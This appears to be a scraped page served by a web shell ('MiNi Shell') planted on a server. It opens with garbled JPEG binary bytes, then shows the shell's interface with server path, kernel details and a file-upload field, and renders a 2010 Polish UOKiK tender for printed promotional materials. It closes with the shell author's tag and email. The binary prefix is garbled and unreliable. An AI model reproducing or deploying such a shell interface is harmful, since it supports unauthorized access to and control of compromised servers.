JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100115/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100115/13444-N-2010.html

<p class="kh_header"><b>Warszawa: CZĘŚĆ I Druk i dostawa materiałów promocyjnych (ołówki, długopisy, kubki porcelitowe) 
CZĘŚĆ II Druk i dostawa materiałów promocyjnych (teczki tekturowe, notatnik) 
CZĘŚĆ III Wykonanie projektu graficznego, druk i dostawa materiałów promocyjnych (smycz)</b><br>
<b>Numer ogłoszenia: 13444 - 2010; data zamieszczenia: 15.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Ochrony Konkurencji i Konsumentów , Pl.  Powstańców Warszawy 1, 00-950 Warszawa, woj. mazowieckie, tel. 022 5560129, faks 022 8270843.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uokik.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> CZĘŚĆ I Druk i dostawa materiałów promocyjnych (ołówki, długopisy, kubki porcelitowe) 
CZĘŚĆ II Druk i dostawa materiałów promocyjnych (teczki tekturowe, notatnik) 
CZĘŚĆ III Wykonanie projektu graficznego, druk i dostawa materiałów promocyjnych (smycz).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Szczegółowy opis przedmiotu zamówienia dla Części I Druk i dostawa materiałów promocyjnych wg załączonych projektów.

1.1. Wykonanie ołówków okrągłych drewnianych z gumką
- ilość: 200 sztuk
- kolor: czarny
- nadruk: dwa nadruki, jeden 2 kolorowy, drugi 1 kolorowy
- zatemperowany
- wymiary: o 7x191 mm
1.2. Wykonanie długopisów 
- ilość: 200 szt.
- model: X-One Frost lub równoważny
- kolor: przezroczysty
- wkład: niebieski
- automatyczny z transparentną główką
- nadruk: 2 kolorowy na korpusie 
1.3. Wykonanie kubków porcelitowych
- ilość: 200 sztuk
- model: Round lub równoważny
- kolor: granatowy błyszczący
- nadruk: dwa nadruki - dwukolorowe
- pojemność: 300 ml
- wymiary: o 83x103 mm

Termin realizacji: 15 dni roboczych 
Wykonawca otrzyma pliki produkcyjne w dniu podpisania umowy, pliki zapisane są w programie CorelDraw, kolory cmyk.
Dostawa oznacza dostarczenie przedmiotu umowy do siedziby UOKiK oraz wniesienie do miejsca w siedzibie Urzędu wskazanego przez Zamawiającego.

2. Szczegółowy opis przedmiotu zamówienia dla Części II Druk i dostawa materiałów promocyjnych wg załączonych projektów.

2.1. Wykonanie teczek tekturowych
- ilość: 300 sztuk
- z dwoma skrzydełkami, z nacięciem do włożenia wizytówki 
- format: 220 x 315 mm po złożeniu
- karton 300g
- biały spód, kolorystyka 2+0
- folia matowa jednostronnie
- sztancowane z wykrojnika, brak klejeń
- teczka bigowana, dostarczona w formie złożonej

2.2. Wykonanie notatników
- ilość: 200 sztuk
- format: A5
- 100 gładkich kartek w bloczku, bloczek klejony po krótkim boku
- papier 80g
- wymiary: szer. 148 mm, wys. 210 mm 
- przednia okładka kreda matowa 240g
- tylnia okładka kreda matowa 300g
- nadruk: 2+0 - zarówno okładka, jak i środek

Termin realizacji: 15 dni roboczych.
Wykonawca otrzyma pliki produkcyjne w dniu podpisania umowy, pliki zapisane są w programie CorelDraw, kolory cmyk.
Dostawa oznacza dostarczenie przedmiotu umowy do siedziby UOKiK oraz wniesienie do miejsca w siedzibie Urzędu wskazanego przez Zamawiającego.

3. Szczegółowy opis przedmiotu zamówienia dla Części III Wykonanie projektu, druk oraz dostawa materiałów promocyjnych wg specyfikacji technicznej.

3.1. Wykonanie smyczy
-ilość: 300 sztuk
-kolor: czarny
-typ: taśma poliestrowa
-szerokość: 10mm
-nadruk:2+2
-rodzaj nadruku: sublimacyjny
-karabińczyk: metalowy

Termin realizacji: 10 dni roboczych.
Przed skierowaniem materiału do druku, konieczne jest uzyskanie akceptacji przez Zamawiającego dla przedstawionego projektu graficznego.
Dostawa oznacza dostarczenie przedmiotu umowy do siedziby UOKiK oraz wniesienie do miejsca w siedzibie Urzędu wskazanego przez Zamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące: 
1.1 posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2 posiadania wiedzy i doświadczenia (zgodnie z wymaganiem określonym w części wymaganych dokumentów); 
1.3 dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
1.4 sytuacji ekonomicznej i finansowej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> B. Wykaz oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu
1.1 Wykonawcy biorący udział w postępowaniu muszą złożyć oświadczenie potwierdzające spełnienie wymagań określonych w art. 22 ust. 1 pkt 1-4 oraz braku podstaw do wykluczenia na podstawie art. 24 ust. 1 i ust 2 ustawy Prawo zamówień publicznych - Załącznik Nr 1 do SIWZ. 

1.2 W przypadku Wykonawców mogących wspólnie ubiegać się o udzielenie zamówienia, przedmiotowe oświadczenie: w zakresie spełniania wymagań określonych w art. 22 ust. 1 pkt 1 - składa każdy odrębnie, natomiast w zakresie określonym w art. 22 ust.1 pkt 2,3 i 4 - wszyscy łącznie. 

2. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie  art. 24 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych, Wykonawca musi złożyć: 

2.1 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru  lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 	

2.2.  Wykonawcy zagraniczni.

2.2.1. Wykonawca zagraniczny (mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej) zamiast dokumentów wskazanych w pkt 2.1.lit. B - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:

a) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej  niż 6 miesięcy przed upływem terminu składania ofert,

b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert

c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawione nie wcześniej niż 6 miesięcy przed upływem składania ofert.

2.2.2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w pkt 2.1. Wykonawca składa dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawione z odpowiednią datą wymaganą dla tego dokumentu.

3. W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia Wykonawca musi złożyć: 

3.1 Dla Części I dokumenty na podstawie których Wykonawca wykaże, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, zrealizował co najmniej dwa zamówienia odpowiadające swoim rodzajem przedmiotowi zamówienia jak określony w SIWZ o wartości 1 000,00 zł brutto każde. Podana wartość musi dotyczyć jednego zamówienia (przez co rozumie się, że musi wynikać z jednostkowej umowy) - Załącznik Nr 2 dla Części I do SIWZ.
Do powyższego wykazu Wykonawca musi dołączyć dokumenty potwierdzające, że zamówienia zostały wykonane należycie. Dokumenty muszą być wystawione przez zamawiającego - odbiorcę zamówienia. 

3.2 Dla Części II dokumenty na podstawie których Wykonawca wykaże, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, zrealizował co najmniej dwa zamówienia odpowiadające swoim rodzajem przedmiotowi zamówienia jak określony w SIWZ o wartości 1 000,00 zł brutto każde. Podana wartość musi dotyczyć jednego zamówienia (przez co rozumie się, że musi wynikać z jednostkowej umowy) - Załącznik Nr 2 dla Części II do SIWZ.
Do powyższego wykazu Wykonawca musi dołączyć dokumenty potwierdzające,     że zamówienia zostały wykonane należycie. Dokumenty muszą być wystawione przez zamawiającego / odbiorcę zamówienia. 

3.3 Dla Części III dokumenty na podstawie których Wykonawca wykaże, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, zrealizował co najmniej dwa zamówienia odpowiadające swoim rodzajem przedmiotowi zamówienia jak określony w SIWZ o wartości 400,00 zł brutto każde. Podana wartość musi dotyczyć jednego zamówienia (przez co rozumie się, że musi wynikać z jednostkowej umowy) - Załącznik Nr 2 dla Części III do SIWZ.
Do powyższego wykazu Wykonawca musi dołączyć dokumenty potwierdzające,    że zamówienia zostały wykonane należycie. Dokumenty muszą być wystawione przez zamawiającego / odbiorcę zamówienia. 


C. Oferta musi zawierać następujące dokumenty i oświadczenia

1. Dokumenty wymienione w punkcie B

2. Oryginał pełnomocnictwa do złożenia oferty lub kopia pełnomocnictwa potwierdzona przez mocodawcę lub notariusza, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Przyjmuje się, że pełnomocnictwo do złożenia oferty upoważnia również do poświadczenia za zgodność z oryginałem kopii wszystkich dokumentów składanych wraz z ofertą, chyba że z treści pełnomocnictwa wynika co innego.

3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

W tym przypadku Wykonawcy występujący wspólnie muszą złożyć: 

a) pełnomocnictwo do reprezentacji podmiotów występujących wspólnie (stanowiące oświadczenie każdego z podmiotów) wystawione zgodnie z dyspozycją zawartą w pkt 10.12, 10.13, 10.14 Części I SIWZ,

b) każdy z uczestników wchodzący w skład podmiotu wspólnie ubiegającego się o udzielenie zamówienia musi załączyć dokumenty wymienione w pkt 1.1, i 1.1, 2.1, 2.2 lit. B Części III SIWZ,

c) Wszystkie dokumenty Wykonawców mogących wspólnie ubiegać się o udzielenie zamówienia muszą wchodzić w skład danej oferty i być złożone łącznie,

d) Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zostanie wybrana, taki Wykonawca będzie zobowiązany przed zawarciem umowy w sprawie zamówienia publicznego do złożenia Zamawiającemu umowy regulującej współpracę tych Wykonawców. 
4. Prawidłowo wypełniony Formularz Cenowy - Załącznik Nr 3 do SIWZ.
5. Prawidłowo wypełniony Formularz Ofertowy - Załącznik Nr 4 do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.uokik.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Ochrony Konkurencji i Konsumentów, 00-950 Warszawa, Pl. Powstańców Warszawy 1, pokój 415.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2010 godzina 12:00, miejsce: Urząd Ochrony Konkurencji i Konsumentów, 00-950 Warszawa, Pl. Powstańców Warszawy 1, pokój 415.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Druk i dostawa materiałów promocyjnych (ołówki, długopisy, kubki porcelitowe).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia dla Części I Druk i dostawa materiałów promocyjnych wg załączonych projektów.

1.1. Wykonanie ołówków okrągłych drewnianych z gumką
- ilość: 200 sztuk
- kolor: czarny
- nadruk: dwa nadruki, jeden 2 kolorowy, drugi 1 kolorowy
- zatemperowany
- wymiary: o 7x191 mm
1.2. Wykonanie długopisów 
- ilość: 200 szt.
- model: X-One Frost lub równoważny
- kolor: przezroczysty
- wkład: niebieski
- automatyczny z transparentną główką
- nadruk: 2 kolorowy na korpusie 
1.3. Wykonanie kubków porcelitowych
- ilość: 200 sztuk
- model: Round lub równoważny
- kolor: granatowy błyszczący
- nadruk: dwa nadruki - dwukolorowe
- pojemność: 300 ml
- wymiary: o 83x103 mm

Termin realizacji: 15 dni roboczych 
Wykonawca otrzyma pliki produkcyjne w dniu podpisania umowy, pliki zapisane są    w programie CorelDraw, kolory cmyk.
Dostawa oznacza dostarczenie przedmiotu umowy do siedziby UOKiK oraz wniesienie do miejsca w siedzibie Urzędu wskazanego przez Zamawiającego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 15.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Druk i dostawa materiałów promocyjnych (teczki tekturowe, notatnik).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2. Szczegółowy opis przedmiotu zamówienia dla Części II Druk i dostawa materiałów promocyjnych wg załączonych projektów.

2.1. Wykonanie teczek tekturowych
- ilość: 300 sztuk
- z dwoma skrzydełkami, z nacięciem do włożenia wizytówki 
- format: 220 x 315 mm po złożeniu
- karton 300g
- biały spód, kolorystyka 2+0
- folia matowa jednostronnie
- sztancowane z wykrojnika, brak klejeń
- teczka bigowana, dostarczona w formie złożonej

2.2. Wykonanie notatników
- ilość: 200 sztuk
- format: A5
- 100 gładkich kartek w bloczku, bloczek klejony po krótkim boku
- papier 80g
- wymiary: szer. 148 mm, wys. 210 mm 
- przednia okładka kreda matowa 240g
- tylnia okładka kreda matowa 300g
- nadruk: 2+0 - zarówno okładka, jak i środek

Termin realizacji: 15 dni roboczych.
Wykonawca otrzyma pliki produkcyjne w dniu podpisania umowy, pliki zapisane są   w programie CorelDraw, kolory cmyk.
Dostawa oznacza dostarczenie przedmiotu umowy do siedziby UOKiK oraz wniesienie do miejsca w siedzibie Urzędu wskazanego przez Zamawiającego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 15.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie projektu graficznego, druk i dostawa materiałów promocyjnych (smycz).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3. Szczegółowy opis przedmiotu zamówienia dla Części III Wykonanie projektu, druk oraz dostawa materiałów promocyjnych wg specyfikacji technicznej.

3.1. Wykonanie smyczy
-ilość: 300 sztuk
-kolor: czarny
-typ: taśma poliestrowa
-szerokość: 10mm
-nadruk:2+2
-rodzaj nadruku: sublimacyjny
-karabińczyk: metalowy

Termin realizacji: 10 dni roboczych.
Przed skierowaniem materiału do druku, konieczne jest uzyskanie akceptacji przez Zamawiającego dla przedstawionego projektu graficznego.
Dostawa oznacza dostarczenie przedmiotu umowy do siedziby UOKiK oraz wniesienie do miejsca w siedzibie Urzędu wskazanego przez Zamawiającego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com